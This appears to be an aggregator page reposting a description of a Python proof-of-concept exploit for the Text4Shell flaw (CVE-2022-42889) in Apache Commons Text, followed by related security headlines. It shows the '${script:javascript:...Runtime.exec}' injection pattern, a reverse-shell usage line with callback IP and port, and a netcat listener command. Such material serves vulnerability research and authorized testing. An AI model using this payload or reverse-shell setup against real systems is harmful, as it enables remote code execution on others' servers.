Lädt...

💾 Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10


Nachrichtenbereich: 💾 IT Security Tools
🔗 Quelle: kitploit.com


A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor class with interpolation enabled, allowing injection of ${script:...} expressions to execute arbitrary system commands.

In this PoC, exploitation is demonstrated via the data query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.

Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.


Description

This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor.

Tested against: - Apache Commons Text < 1.10.0 - Java applications using ${script:...} interpolation from untrusted input

Usage

python3 text4shell.py <target_ip> <callback_ip> <callback_port>

Example

python3 text4shell.py 127.0.0.1 192.168.1.2 4444

Make sure to set up a lsitener on your attacking machine:

nc -nlvp 4444

Payload Logic

The script injects:

${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

The reverse shell is sent via /data parameter using a POST request.



...

🕵️ Text4Shell, a remote code execution bug in Apache Commons Text library


📈 64.66 Punkte
🕵️ Hacking

📰 Hackers Started Exploiting Critical "Text4Shell" Apache Commons Text Vulnerability


📈 61.61 Punkte
📰 IT Security Nachrichten

🕵️ Apache Commons “Text4Shell” Flaw Could Trigger Code Execution With Malicious Input


📈 53.28 Punkte
🕵️ Hacking

📰 Text4Shell: Critical Code Execution in Apache Common Text Library – Patch Now!


📈 53.28 Punkte
📰 IT Security Nachrichten

📰 Exploit Attempts Underway for Apache Commons Text4Shell Vulnerability


📈 51.89 Punkte
📰 IT Security Nachrichten

🕵️ Apache Commons Text 1.10.0 Remote Code Execution


📈 39.63 Punkte
🕵️ Sicherheitslücken

⚠️ [webapps] Apache Commons Text 1.10.0 - Remote Code Execution


📈 39.63 Punkte
⚠️ PoC

🕵️ Apache Commons Text 1.9 Remote Code Execution


📈 39.63 Punkte
🕵️ Sicherheitslücken

📰 Researchers Keep a Wary Eye on Critical New Vulnerability in Apache Commons Text


📈 36.58 Punkte
📰 IT Security Nachrichten

🕵️ PoC Exploit Code Released for Citrix ACD and Gateway Remote Code Execution Vulnerability


📈 33.39 Punkte
🕵️ Hacking

📰 Critical Apache Commons Text Flaw Compared to Log4Shell, But Not as Widespread


📈 33.27 Punkte
📰 IT Security Nachrichten

📰 PoC targeting critical Apache Struts bug found online


📈 32.22 Punkte
📰 IT Security Nachrichten

🕵️ Python JSON Logger Vulnerability Enables Remote Code Execution – PoC Released


📈 31.6 Punkte
🕵️ Hacking

⚠️ #0daytoday #Apache Shiro 1.2.4 Remote Code Execution Exploit CVE-2016-4437 [remote #exploits #0day #Exploit]


📈 31.57 Punkte
⚠️ PoC

⚠️ #0daytoday #Apache 2.4.50 Remote Code Execution Exploit Vilius Povilaika [remote #exploits #0day #Exploit]


📈 30.61 Punkte
⚠️ PoC

⚠️ #0daytoday #Apache Syncope 2.0.7 Remote Code Execution Exploit [remote #exploits #0day #Exploit]


📈 30.61 Punkte
⚠️ PoC

⚠️ #0daytoday #Apache Tomcat JSP Upload Bypass Remote Code Execution Exploit [remote #exploits #0day #Exploit]


📈 30.61 Punkte
⚠️ PoC

⚠️ #0daytoday #Apache Solr Backup/Restore API Remote Code Execution Exploit [remote #exploits #0day #Exploit]


📈 30.61 Punkte
⚠️ PoC

⚠️ #0daytoday #Apache ActiveMQ Unauthenticated Remote Code Execution Exploit [remote #exploits #0day #Exploit]


📈 30.61 Punkte
⚠️ PoC